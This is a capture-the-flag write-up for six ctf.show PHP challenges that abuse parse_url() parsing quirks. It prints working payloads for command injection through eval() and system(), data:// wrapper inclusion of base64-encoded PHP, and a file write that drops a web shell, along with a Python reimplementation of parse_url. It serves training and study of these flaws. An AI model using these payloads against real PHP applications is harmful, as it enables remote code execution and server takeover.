CTFShow platform: https://ctf.show/
Level 1:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2023-05-10 09:52:06
# @Last Modified by: h1xa
# @Last Modified time: 2023-05-10 10:58:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
eval($data['host']);
Payload: ?u=http://system('cd ..;cd ..;cd ..;cat flag_is_here.txt');
parse_url() puts everything between the "//" and the next "/", "?" or "#" into $data['host'] without checking a single character of it, so the spaces, quotes, parentheses and trailing ";" all survive and eval() receives a complete PHP statement. Spaces and quotes only have to be URL-encoded on the wire; PHP decodes $_GET before parse_url() ever sees the value. The three "cd .." climb out of the document root (/var/www/html, as the level 6 payload shows) up to /, where flag_is_here.txt lives.
You can also plant an eval() that reads from POST and then run commands through it:
?u=http://eval($_POST[a]);
post: a=system("ls /");
List the directory, find flag_is_here.txt and cat it to get the flag.
ctfshow{a0e80fdb-2488-41ec-ab41-3f444485afb6}
Level 2:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2023-05-10 09:52:06
# @Last Modified by: h1xa
# @Last Modified time: 2023-05-12 13:25:53
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
include $data['host'].$data['path'];
Payload:
get: ?u=ctfshow://data:://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8%2b
The scheme does not matter here; the trick is the double colon. parse_url() treats whatever follows the last ":" of the authority as the port, and an empty port is accepted, so "data::" parses to host "data:" (the first colon stays in the host, the second is consumed as the port separator) and the path is "//text/plain;base64,...". Concatenated, include() receives data://text/plain;base64,..., which the data:// stream wrapper turns into the decoded body <?php system('cat /_f*');?> (the challenge must be running with allow_url_include=On for include to accept a data:// URL). %2b is the URL-encoded "+" of the base64 text; sent as a literal "+" it would be decoded to a space and corrupt the payload.
ctfshow{d855cf94-0ea0-4ae6-9983-25331dae4b3d}
Level 3:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2023-05-10 09:52:06
# @Last Modified by: h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
include $data['scheme'].$data['path'];
Payload:
get: ?u=data:://test/plain;base64,PD9waHAgc3lzdGVtKCRfUE9TVFtBXSk7Pz4=
post: A=tac /_f*
This time the host is discarded and scheme and path are glued together. The scheme ends at the first ":"; because the character after it is another ":" rather than "/", parse_url() treats the whole remainder as the path, giving scheme "data" and path "://test/plain;base64,...". scheme.path is therefore data://test/plain;base64,... once again. The base64 decodes to <?php system($_POST[A]);?>, so the command goes in the POST body. The data:// wrapper does not check the MIME type, which is why "test/plain" works just as well as text/plain.
ctfshow{595cf0e0-350b-4a58-aa16-970b290fd1c9}
Level 4:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2023-05-10 09:52:06
# @Last Modified by: h1xa
# @Last Modified time: 2023-05-12 13:29:35
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
system($data['host']);
Payload: ?u=http://cd ..;cd ..;cd ..;tac 1_f1ag_1s*
Same host extraction as level 1, but now the host goes straight to system() as a shell command line, so spaces, semicolons and a glob all pass through. The only characters that would cut the host short are "/", "?" and "#", which is why the flag is reached with "cd .." three times plus a wildcard rather than with an absolute path like /1_f1ag_1s*.
ctfshow{644f5bb8-5572-4569-882d-1a5673e01f9b}
Level 5:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2023-05-10 09:52:06
# @Last Modified by: h1xa
# @Last Modified time: 2023-05-12 13:29:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
extract(parse_url($_GET['u']));
include $$$$$$host;
Payload:
get: ?u=%75%73%65%72%3a%2f%2f%70%61%73%73%3a%71%75%65%72%79%40%73%63%68%65%6d%65%2f%3f%66%72%61%67%6d%65%6e%74%23%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%3b%62%61%73%65%36%34%2c%50%44%39%77%61%48%41%67%63%33%6c%7a%64%47%56%74%4b%43%52%66%55%45%39%54%56%46%74%42%58%53%6b%37%50%7a%34%3d
post: A=tac /_f1a*
Decoded, the GET parameter is:
user://pass:query@scheme/?fragment#data://text/plain;base64,PD9waHAgc3lzdGVtKCRfUE9TVFtBXSk7Pz4=
extract() turns every component parse_url() returns into a variable of the same name: $scheme="user", $user="pass", $pass="query", $host="scheme", $path="/", $query="fragment" and $fragment="data://...". $$$$$$host is six lookups through exactly that chain: $host is "scheme", $scheme is "user", $user is "pass", $pass is "query", $query is "fragment", and $fragment is the data:// URL, which is what include() finally receives; the base64 is once more <?php system($_POST[A]);?>. The whole payload is percent-encoded, but the character that genuinely has to be is the "#" (%23): sent raw, the browser keeps the fragment on the client side and the server never sees the data:// part.
ctfshow{2c95c0cf-6c53-46ce-bd87-1221067bc07a}
Level 6:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2023-05-10 09:52:06
# @Last Modified by: h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
file_put_contents($data['path'], $data['host']);
Payload:
get: ?u=http://111<script language="php">eval($_POST[A]);/var/www/html/zzz.php
post: A=system("tac /_f1a*");
The host becomes the file content and the path the file name, so this drops a web shell into the document root. A normal <?php tag cannot be used, because "?" terminates the authority and starts the query string, so the host would end right before the tag; the payload uses the old <script language="php"> open tag instead, which contains no "?" at all. That tag only exists in PHP 5 (PHP 7.0 removed it together with the ASP-style tags), so the payload depends on the challenge running an old PHP. The "111" in front is just text outside the tag and is echoed harmlessly. Then POST the command to /zzz.php.
ctfshow{ba400845-b41f-4612-8f5a-30fa718db9a1}
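To make the parse_url() behaviour that all six levels exploit concrete, here is an added example (my own illustration, not challenge code and not anything from ctf.show or h1xa): a reduced Python port of the rules in PHP's php_url_parse_ex (ext/standard/url.c), plus a function that reconstructs the exact string each level's sink receives, including the six-hop variable-variable chain of level 5 and the base64 body the data:// wrapper would feed to include(). The payloads are the writeup's, percent-decoded as PHP sees them in $_GET['u']; the names php_parse_url, sink_input, data_wrapper_body and PAYLOADS are chosen here. Not modelled: IPv6 hosts, file:// drive letters, the bare "host:port" form and PHP's control-character rewriting.

```python
# Added illustration, not the challenge code: a reduced port of the parsing rules
# in PHP's php_url_parse_ex (ext/standard/url.c) that the six levels rely on.
import base64


def _just_path(url, s, ret):
    """PHP's just_path label: [path][?query][#fragment] from offset s."""
    e = len(url)
    for ch, key in (('#', 'fragment'), ('?', 'query')):
        p = url.find(ch, s, e)
        if p != -1:
            if p + 1 < e:
                ret[key] = url[p + 1:e]
            e = p
    if s < e or s == len(url):
        ret['path'] = url[s:e]
    return ret


def _parse_host(url, s, ret):
    """PHP's parse_host label: [user[:pass]@]host[:port], ending at /, ? or #."""
    e = min([i for i in (url.find(c, s) for c in '/?#') if i != -1] + [len(url)])
    at = url.rfind('@', s, e)
    if at != -1:
        colon = url.find(':', s, at)
        ret['user'] = url[s:colon if colon != -1 else at]
        if colon != -1:
            ret['pass'] = url[colon + 1:at]
        s = at + 1
    # The port is whatever follows the LAST ':' of the authority.  An empty port
    # ("data::") is accepted and that ':' dropped, so the host becomes "data:".
    # The characters of the host itself are never validated.
    p = url.rfind(':', s, e)
    if p == -1:
        p = e
    else:
        port_str = url[p + 1:e]
        digits = port_str[:len(port_str) - len(port_str.lstrip('0123456789'))]
        if len(port_str) > 5 or (port_str and not 0 < int(digits or '0') <= 65535):
            return None                     # PHP returns false (strtol approximated)
        if port_str:
            ret['port'] = int(digits)
    if p - s < 1:
        return None                         # empty host: PHP returns false
    ret['host'] = url[s:p]
    return ret if e == len(url) else _just_path(url, e, ret)


def php_parse_url(url):
    """Return a dict like PHP's parse_url(), or None where PHP returns false."""
    ret, ue = {}, len(url)
    e = url.find(':')
    if e == -1:                             # no scheme: "//host/..." or a bare path
        return _parse_host(url, 2, ret) if url.startswith('//') else _just_path(url, 0, ret)
    if e == 0 or not all(c.isalnum() or c in '+.-' for c in url[:e]):
        raise NotImplementedError('":" outside a scheme is not modelled here')
    if e + 1 == ue:
        return {'scheme': url[:e]}
    ret['scheme'] = url[:e]
    if url[e + 1] != '/':                   # "data:..." style: the rest is the path
        p = e + 1
        while p < ue and url[p].isdigit():
            p += 1
        if (p == ue or url[p] == '/') and (p - e) < 7:
            raise NotImplementedError('"host:port" without scheme is not modelled here')
        return _just_path(url, e + 1, ret)
    if not (e + 2 < ue and url[e + 2] == '/'):
        return _just_path(url, e + 1, ret)  # "scheme:/path"
    return _parse_host(url, e + 3, ret)     # past "scheme://"


def sink_input(level, u):
    """Reconstruct the string that reaches each level's dangerous call."""
    d = php_parse_url(u)
    if level in (1, 4):                     # eval($data['host']) / system($data['host'])
        return d['host']
    if level == 2:                          # include $data['host'].$data['path']
        return d['host'] + d['path']
    if level == 3:                          # include $data['scheme'].$data['path']
        return d['scheme'] + d['path']
    if level == 5:                          # extract(parse_url($u)); include $$$$$$host;
        name = 'host'
        for _ in range(6):                  # six '$' = six symbol-table lookups
            name = d[name]                  # extract() made every key a variable
        return name
    if level == 6:                          # file_put_contents($data['path'], $data['host'])
        return d['path'], d['host']
    raise ValueError(level)


def data_wrapper_body(uri):
    """What the data:// wrapper yields to include(): the text after the comma,
    base64-decoded when the ';base64' parameter is present."""
    meta, _, body = uri.partition(',')
    return base64.b64decode(body).decode() if meta.endswith(';base64') else body


# The writeup's payloads, percent-decoded as PHP sees them in $_GET['u'].
PAYLOADS = {
    1: "http://system('cd ..;cd ..;cd ..;cat flag_is_here.txt');",
    2: "ctfshow://data:://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8+",
    3: "data:://test/plain;base64,PD9waHAgc3lzdGVtKCRfUE9TVFtBXSk7Pz4=",
    4: "http://cd ..;cd ..;cd ..;tac 1_f1ag_1s*",
    5: "user://pass:query@scheme/?fragment#data://text/plain;base64,PD9waHAgc3lzdGVtKCRfUE9TVFtBXSk7Pz4=",
    6: 'http://111<script language="php">eval($_POST[A]);/var/www/html/zzz.php',
}

if __name__ == '__main__':
    for lvl, u in PAYLOADS.items():
        print(lvl, sink_input(lvl, u))
```

Running it prints, per level, the host that eval()/system() executes, the data:// URL the two include() variants and the level 5 chain resolve to, and the (path, content) pair level 6 writes. The two things worth noticing in the port are that the host is cut only by "/", "?" and "#" and never validated, and that the port scan works backwards from the last ":" of the authority, which is what makes the "data::" trick produce "data:" as the host.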
With that, this week's weekend challenge is fully cleared. Thanks for reading; my approach differs from the official writeup (I finished it at the time but didn't write it up promptly, so I'm completing it now; another productive day 😊!)